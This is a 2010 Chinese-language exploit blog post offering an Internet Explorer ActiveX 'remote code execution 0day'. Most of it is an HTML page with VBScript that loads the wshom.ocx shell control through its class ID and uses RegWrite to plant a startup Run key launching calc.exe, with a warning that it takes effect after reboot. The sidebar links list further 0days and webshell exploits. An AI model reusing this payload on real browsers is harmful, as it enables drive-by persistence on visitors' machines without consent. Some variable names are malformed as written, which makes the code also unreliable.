传说中的IE最新0DAY(IE的ActiveX远程执行代码2(不安全的方法))

2010, January 24, 2:10 PM. oday收藏
Submitted by admin

来源:坏人咖啡的窝

这个代码会写入启动项,各位看官测试的时候注意了,不会当时生效,重启后可见效果!

测试代码:


<html>  

<object classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' id='target' ></object>
<script language='vbscript'>  

targetFile = "c:\WINDOWS\system32\wshom.ocx"
prototype  = "Sub RegWrite ( ByVal Name As String ,  ByRef Value As Variant ,  [ ByRef Type As Variant ] )"
memberName = "RegWrite"
progid     = "IWshRuntimeLibrary.IWshShell_Class"
argCount   = 3  

D3V!L FUCKER="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
germaya_x="C:\WINDOWS\system32\calc.exe"
his0k4="REG_SZ"  

target.RegWrite D3V!L FUCKER ,germaya_x ,his0k4
</script>
Tags: oday, ie

« 上一篇 | 下一篇 »

只显示10条记录相关文章
ecshop最新版(v272) 本地包含漏洞ODAY(鸡肋) (浏览: 15884, 评论: 0)
V5-SHOP商城0day (浏览: 9285, 评论: 0)
无忧购物时尚ASP版 oday (浏览: 11870, 评论: 0)
ECSHOP 2.7.X注入漏洞_20100507 (浏览: 15868, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 11560, 评论: 0)
良精所有产品通杀 (浏览: 8709, 评论: 0)
shopwind oday 分析 (浏览: 8899, 评论: 0)
云起企业建站系统通杀oday (浏览: 11025, 评论: 0)
Discuz! 6.x/7.x SODB-2008-13 Exp (浏览: 12001, 评论: 0)
又一个IE的最新0DAY(IE浏览器wshom.ocx ActiveX控件远程代码执行) (浏览: 8157, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):